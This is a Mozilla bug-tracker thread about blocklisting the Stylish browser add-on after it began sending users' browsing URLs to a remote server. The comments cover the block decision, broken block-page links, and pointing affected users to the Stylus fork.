Blocklist Stylish add-on - sends full page urls to remote server

RESOLVED FIXED

Status

()

Toolkit
Blocklisting
RESOLVED FIXED
19 days ago
13 days ago

People

(Reporter: mike.maccana, Assigned: TheOne)

Tracking

Firefox Tracking Flags

(Not tracked)

Details

(URL)

(Reporter)

Description

19 days ago
User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Build ID: 20180628175621

Steps to reproduce:

The 'Stylish' extension was recently sold and the new company now logs all browser history. 

https://robertheaton.com/2018/07/02/stylish-browser-extension-steals-your-internet-history/

This likely also affects Firefox. The etxension is available on the extension store and also on https://addons.mozilla.org/en-GB/firefox/addon/stylish/?src=search has has 300K users.


Actual results:

Store my internet history


Expected results:

Didn't steal my internet history
(Reporter)

Updated

19 days ago
Summary: Stylish extension is records all intrnet history and should be blocked / removed from extensions store / removed from FF → Stylish extension is records all history and should be blocked / removed from extensions store / removed from FF

Updated

19 days ago
Component: Untriaged → Blocklisting
OS: Unspecified → All
Product: Firefox → Toolkit
Hardware: Unspecified → All
(Reporter)

Updated

19 days ago
Summary: Stylish extension is records all history and should be blocked / removed from extensions store / removed from FF → Stylish extension records all history and should be blocked / removed from extensions store / removed from FF

Updated

19 days ago
Status: UNCONFIRMED → NEW
Ever confirmed: true

Updated

19 days ago
Summary: Stylish extension records all history and should be blocked / removed from extensions store / removed from FF → Blocklist Stylish add-on - sends full page urls to remote server
(Assignee)

Comment 1

18 days ago
We decided to block because of violation of data practises outlined in the review policy.
Assignee: nobody → awagner
(Assignee)

Comment 2

18 days ago
The block has been staged. Philipp, could you please review and approve?
Flags: needinfo?(philipp)
Done
Status: NEW → RESOLVED
Last Resolved: 18 days ago
Flags: needinfo?(philipp)
Resolution: --- → FIXED

Comment 4

18 days ago
I see, with this bug, that Stylish is blocked, and why.

However, on ESR 52.8.1, the block incorrectly refers to the wrong bug for "more information".  I have Stylish version 3.1.1

The URL for more information directs the user to:  https://blocked.cdn.mozilla.net/i19.html
That webpage refers to version 1.1b1 of Stylish, and a block request date of March 2011.  It does not refer to this bug 1472948, rather to the old bug 621660 from March 2011.

Comment 5

18 days ago
(In reply to john ruskin from comment #4)
> However, on ESR 52.8.1, the block incorrectly refers to the wrong bug for
> "more information".  
 I've filed https://bugzilla.mozilla.org/show_bug.cgi?id=1473194 for this as it might be an orthogonal concern to this bug.
The correct block page is https://blocked.cdn.mozilla.net/c635229f-7aa0-44c5-914f-80c590949071.html

Which tells me "Why was it blocked? This add-on violates data practices outlined in the review policy."

As a user that's not particularly helpful. You've just disabled a feature of the browser that I liked, and justified that with a vague mention of "data practises". That won't mean much to most users. Are we able to rephrase / expand that so your average person understands why they can't use Stylish any more?

Additionally there is no suggested action, other than to live without the feature that the extension offered. Could we point users to https://addons.mozilla.org/en-GB/firefox/addon/styl-us/ which is a Stylish fork without the spyware?
(Reporter)

Comment 7

18 days ago
Original reporter here: does this mean Stylish will get removed / cleaned from existing Firefox installations?

Comment 8

18 days ago
(In reply to mike.maccana from comment #7)
> Original reporter here: does this mean Stylish will get removed / cleaned
> from existing Firefox installations?

It will be disabled, not removed. Users will get a warning though with a request to (optionally) restart the browser.
(Reporter)

Comment 9

18 days ago
(In reply to Peter Wu from comment #8)

Thanks Peter.

Comment 10

17 days ago
(In reply to Ian Thomas ('thelem') from comment #6)
> Additionally there is no suggested action, other than to live without the
> feature that the extension offered. Could we point users to
> https://addons.mozilla.org/en-GB/firefox/addon/styl-us/ which is a Stylish
> fork without the spyware?

I don't know whether that is permissible, but users definitely will need assistance. There already are a number of "what's going on" threads on the Stylish forums, but many users may not know about this site: https://forum.userstyles.org/categories/stylish

Comment 11

16 days ago
According to the linked article, Stylish has been stealing browser history data since January 2017. Mozilla and the user community are apparently just finding out about this now, a year and a half later. The extension has been in the system, displaying the offending behavior, the entire time.

I think there's a broader bug here, along the lines of "extensions can get away with malicious behavior for a long time without anyone noticing", or "it is possible and profitable to buy and maliciously monetize popular extensions", or even "extension developers don't get paid for their work and so have an incentive to sell out".

Comment 12

16 days ago
Thanks, people. 

(In reply to Peter Wu from comment #8)

> It will be disabled, not removed. …

No alert for legacy 2.1.1. This seems proper. 

Stylish 3.1.1 block-listed and disabled, 2.1.1 enabled : waterfox
<https://new.reddit.com/comments/8wd5wu/-/>

(In reply to Ian Thomas ('thelem') from comment #6)

> The correct block page is
> https://blocked.cdn.mozilla.net/c635229f-7aa0-44c5-914f-80c590949071.html

I was directed to <https://blocked.cdn.mozilla.net/i1900.html>. 

I guess that the two URLs are synonymous.

(In reply to jscher2000 from comment #10)

> … a number of "what's going on" threads on the Stylish forums, …

https://web.archive.org/web/*/https://forum.userstyles.org/discussion/67684/no-longer-available-on-amo captures the first.

Comment 13

16 days ago
Hi anovak, I think the relevant date is more recent. 

Stylish for Chrome first got the behavior of sending the current tab URL to the publisher to get script recommendations as an "opt out" feature. It was clear that for Firefox, it would have to be an "opt in" feature to comply with policy.

When the WebExtensions port was released around November 10, 2017, its default setting appears to have been correct, and there was not even an opt-in/opt-out checkbox. People who checked did not observe the api.userstyles.org calls in the Browser Console in version 3.0.1. I still have that XPI if anyone wants to check it: https://www.jeffersonscher.com/temp/Stylish301Fx/

Version 3.0.5 was released on April 24, 2018 -- I have no XPI or other information

Version 3.1.1 was released on May 23, 2018 -- coincidentally (?), the release was one day after SimilarWeb updated its privacy policy. This version has the impermissible opt-out feature from the Chrome extension -- user is automatically opted in to data sharing.

Since data sharing (exfiltration) is a policy (user consent) issue and not a specific function, I can't imagine how an automated review would catch the change. But flagging extensions that use fetch and XMLHttpRequest for human review could be helpful. Whether that would have caught this within the six weeks since 3.1.1. was released, I have no idea.

Comment 14

16 days ago
Previous versions of Stylish for Firefox did not include this behavior. A recent version did, and that is why it was blocked.

Stylus is an alternative, so feel free to recommend it to people. We are also in the process of providing more support to affected users.

Please post any additional questions in our discussion forum: https://discourse.mozilla.org/c/add-ons
Than you everyone for the comments and inquiries you have made here, I understand this is an issue that brings up a lot of questions. At the same time, this is a bug tracker meant mostly for technical discussion around the actions taken.

Therefore, I am restricting comments to this bug. If you have further questions, please follow the link to our discussion forums Amy posted in the previous comment. Thank you for your understanding.
Restrict Comments: true
(Assignee)

Updated

16 days ago
Duplicate of this bug: 1473719
We have pushed a Heartbeat message to Stylish users, giving them Styl-us as an option.
status-firefox62: --- → affected
status-firefox62: affected → ---
Version: 62 Branch → unspecified
You need to log in before you can comment on or make changes to this bug.